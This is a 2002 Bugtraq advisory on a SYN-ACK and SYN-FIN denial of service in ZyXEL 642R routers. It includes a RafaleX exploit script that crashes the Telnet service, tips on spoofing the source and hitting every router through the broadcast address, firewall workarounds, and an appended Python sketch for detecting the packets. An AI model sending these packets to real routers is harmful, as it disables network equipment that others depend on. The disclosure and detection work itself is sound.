Bugtraq mailing list archives

ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS


From: Kistler Ueli <iuk () gmx ch>
Date: Mon, 17 Jun 2002 14:59:11 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Name: ZyXEL 642R(-11) AJ.6, other routers based on ZyNOS are also
susceptible to this DoS
Systems Affected:  ZyNOS
Severity:  Medium Risk
Category: Denial of Service
Vendor URL: www.zyxel.com

Vendor contacted: 1.6.2002
Vendor fix: -

Summary
-------
ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
It is possible to send a packet that will make the router's services
unavailable (Telnet & FTP; DHCP service not tested).
Network traffic isn't stopped.

Possibly more ZyNOS based routers are vulnerable. Please reply if you
found any other ZyNOS based router vulnerable.

Details
-------
A ZyXEL 642R-11 router service can be crashed by sending a packet
with TCP flags ACK and SYN set at the same time.
The service will not be available even through RS-232.
Using a SYN-FIN packet will make the service port inaccessible for a
few minutes.

Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if
enabled). TELNET and FTP cannot be deactivated.

Bypass packet filter rules:
The IP source can also be a spoofed one. This makes it possible to "bypass"
a filter that blocks specific IPs.
As the target address you can also use the WAN address from the LAN (see
BID3346: http://online.securityfocus.com/bid/3346), if the router's
packet filter blocks its local address as a target.
The DoS attack also works using the broadcast address of the LAN.
This means that all ZyXEL routers in the LAN that are vulnerable
to this attack can be crashed by sending one single packet.

Exploit
-------

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6))

!Sleep 1000

!Display=$done

Fix
---
Not yet available (17.6.2002). Vendor was contacted 1.6.2002.

Workaround
----------
- on WAN device block these packets:
 - all packets coming from WAN to port 21, 23 and 67
   (source: 0.0.0.0 -> target: 0.0.0.0, apply on input filter of WAN device)
- on LAN device block these packets, ports 21, 23 and 67:
 - WAN IP of the router as target IP (Why? http://online.securityfocus.com/bid/3346 ..)
 - LAN address of the router as target IP
 - Broadcast address as target IP.. ;)

Regards,
 Ueli Kistler
 eclipse () packx net / iuk () gmx ch
 www.packx.net / www.eclipse.fr.fm (IDScenter 1.09 beta 2 is soon
out)

Greets to PacKX Team (RafaleX packet builder for Win2K/XP)

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBPQ3dBmnfm6NyZfRJEQKxCACfZhLa34IfHY7NL5bSl9NK11nUI+EAoNLF
ZS3YZqNynsew/jYuvcnLhUVT
=hDk8
-----END PGP SIGNATURE-----

Key-ID: 0x7265F449
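
The following detection sketch is an added example, not part of the original advisory or of any ZyXEL or PacKX code. It parses raw IPv4/TCP headers and flags SYN-ACK or SYN-FIN packets aimed at the workaround's ports on the router's WAN, LAN or broadcast address; the addresses, function names and sample packets are assumptions constructed for illustration.

```python
import ipaddress
import struct

# Assumed addresses for illustration (not from the advisory):
# router WAN IP, router LAN IP, LAN broadcast address.
ROUTER_TARGETS = {"192.0.2.1", "192.168.1.1", "192.168.1.255"}
SERVICE_PORTS = {21, 23, 67}          # ports listed in the workaround
FIN, SYN, ACK = 0x01, 0x02, 0x10      # TCP flag bits

def classify(packet: bytes):
    """Return 'SYN-FIN' or 'SYN-ACK' for a matching raw IPv4 packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 6:
        return None                    # not IPv4/TCP
    ihl = (packet[0] & 0x0F) * 4
    frag_offset = struct.unpack("!H", packet[6:8])[0] & 0x1FFF
    if ihl < 20 or frag_offset or len(packet) < ihl + 14:
        return None                    # bad header, later fragment, or truncated
    dst = str(ipaddress.IPv4Address(packet[16:20]))
    dport = struct.unpack("!H", packet[ihl + 2:ihl + 4])[0]
    flags = packet[ihl + 13]
    # The source address is ignored on purpose: the advisory notes it can be spoofed.
    if dst not in ROUTER_TARGETS or dport not in SERVICE_PORTS:
        return None
    if flags & SYN and flags & FIN:
        return "SYN-FIN"
    if flags & SYN and flags & ACK:
        return "SYN-ACK"
    return None

def sample_packet(dst, dport, flags, src="203.0.113.9", sport=40000):
    """Constructed header bytes for testing the classifier (checksums left at zero)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 1024, 0, 0)
    return ip + tcp

def scan(packets):
    """Return (index, reason) for every packet that matches."""
    return [(i, r) for i, p in enumerate(packets) if (r := classify(p))]

if __name__ == "__main__":
    capture = [sample_packet("192.168.1.1", 23, SYN),          # normal connection attempt
               sample_packet("192.168.1.1", 23, SYN | ACK),
               sample_packet("192.168.1.255", 21, SYN | FIN)]
    print(scan(capture))
```

A SYN-ACK is only legitimate as the reply to a connection the receiver opened, so one arriving at a listening service port on the router is worth alerting on; SYN-FIN has no legitimate use at all.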

